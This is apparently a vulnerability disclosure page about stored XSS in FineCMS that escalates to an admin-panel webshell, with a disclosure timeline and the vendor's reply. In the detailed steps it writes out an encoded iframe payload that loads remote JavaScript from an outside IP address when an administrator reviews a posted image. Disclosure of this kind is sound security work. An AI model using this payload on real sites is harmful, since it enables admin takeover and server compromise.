漏洞概要
关注数(24)
关注此漏洞
漏洞标题: FineCMS 最新版存储型xss跨后台getshell和多处xss合集
提交时间:2014-09-23 12:02
修复时间:2014-12-22 12:04
公开时间:2014-12-22 12:04
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-09-23: 细节已通知厂商并且等待厂商处理中
2014-09-23: 厂商已经确认,细节仅向厂商公开
2014-09-26: 细节向第三方安全合作伙伴开放
2014-11-17: 细节向核心白帽子及相关领域专家公开
2014-11-27: 细节向普通白帽子公开
2014-12-07: 细节向实习白帽子公开
2014-12-22: 细节向公众公开
简要描述:
FineCMS 最新版xss跨后台getshell和多处xss合集,我知道这个厂商习惯性忽略,但是这只是一个开始,一个开始,开始...........................
详细说明:
首先我们演示一下第一个xss,通过这个xss,反弹后台getshell:
第一步,我们注册一个用户,如果管理员审核通过,也就是说这个用户是个普通的正常用户
我们去图片发表处:
下来我们看看本页也能弹出来:
下来我们去后台看看 是否能够弹出来:
ok 到这里我们已经看到了这个xss,肯定会引起管理员的审核:
下来我们更换xss的payload:
我们用iframe标签:
加载远端js
src='data:text/html;base64,<script src=http://10.65.10.70/shell.js ></script>'
然后进行变性编码:
sda'"><iframe src='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEwLjY1LjEwLjcwL3NoZWxsLmpzID48L3NjcmlwdD4=' >
下来我们来编写这个js的内容:
这里首先贴两张图片:
当管理员审核刚才的图片时候,就会中招:
ok证明到此为止
下来我们看看其他基础存储型xss:
看见了没有 这里弹出来了
应该还有好多地方.....................
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2014-09-23 12:20
厂商回复:
对应的字段你没有开启xss过滤,默认是关闭的
最新状态:
暂无
漏洞评价:
评论
-
2014-09-23 12:38 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2014-10-14 02:36 |
小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)
厂商总是喜欢说"对应的字段你没有开启xss过滤,默认是关" 听了就恶心……